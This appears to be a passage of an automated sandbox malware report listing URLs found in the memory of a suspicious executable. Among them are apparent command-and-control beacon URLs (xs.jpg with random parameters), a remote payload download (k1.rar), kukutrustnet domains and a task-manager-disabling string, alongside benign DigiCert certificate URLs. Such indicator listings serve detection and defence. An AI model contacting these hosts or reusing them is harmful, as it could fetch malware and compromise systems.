        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1a33e4b=109902124
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1ad41f3e=450109246
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?2c73ccc=186446640
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?5e41367=98833255
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?5f87de0d=2115991604
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?5f87de0d=2115991604p
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?63977b=19580529
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?63977b=19580529&
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?741b0543=1947927875
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?741b0543=1947927875n&#
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?9b39c81=651063812h
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?9e2ac5aa=2024478376
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?9e2ac5aa=2024478376E
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?b7b2891=1733586201
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?b7b2891=17335862014
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?b7b2891=1733586201;A
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?b7b2891=1733586201UA
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?b7b2891=1733586201V
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?baebcf66=1295391228
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?c7d4d608=1993464376DA
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?c7d4d608=1993464376g
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?ea3b604f=-1460829892
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?ea3b604f=-14608298921
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?fc675e35=-120669078
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?fc675e35=-120669078C&P
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpgs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?1952911=185868151
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?216d3e73=-930122062
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?216d3e73=-930122062E
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?224a908=215742000
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?2322230a=-1347768526
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?2322230a=-1347768526w
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?327e2a9f=-118642122
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?35f32514=1810254376
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?35f32514=1810254376W
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?48dbc808=-1850241008;
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?60b080=25346560=
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?60b080=25346560le
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?67316d6f=898910285
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?912c2e80=445489792
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?96faab4=1108191980P
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?99af4b5=1289201064a
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?9ba60573=343684734
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?9ba60573=3436847343
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?9f1f7a44=-1743041436
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a62d3528=-1506986712-
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a62d3528=-1506986712?
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983Y
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983u
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?a8434aa9=-1471984983y
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?dbb63107=-575567816#
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://arthur.niria.biz/xs.jpg?dbb63107=-575567816I
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A4E000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: svchost.exe, 00000019.00000000.1455395047.000001F0FD7B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A4E000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: svchost.exe, 00000019.00000000.1455395047.000001F0FD7B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: SearchApp.exe, 0000001F.00000000.1534355019.000001CE1226B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536602109.000001CE13F7A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1568208623.000001D61C738000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A19000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000002.2517306215.0000014226A4E000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 00000019.00000000.1455395047.000001F0FD7B3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: YMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1305339645.0000000000C6A000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000003.1304793378.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1363036356.000000000285A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
        Source: YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarR.
        Source: YMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rares$=
        Source: YMZwp.exe, 00000009.00000003.1305108589.0000000000C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rario
        Source: YMZwp.exe, 00000009.00000002.1358038153.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarl.
        Source: YMZwp.exe, 00000009.00000002.1363036356.000000000285A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?13497c1=182015433
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?13b6749=62010843
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?19106679=-89915206
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?19106679=-899152067
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?1c98993=209896197
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?31651bdd=-1131545915
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?31651bdd=-1131545915~
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?374a39ba=-584522008
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?3e81bdc=393258792
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?4589f513=-794960071
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?6211d095=-726522414
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?8465cc=60737684
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?89e1f0a8=-1318472888
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?91707008=1755488304K
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?a3e16ea4=2066351740
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?a3e16ea4=2066351740S
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?a5e467df=-1752064132
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?a95dff7=1420754872F
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?a95dff7=1420754872b
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://g2.arrowhitech.com/xs.jpg?e03c7453=-1034122434
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
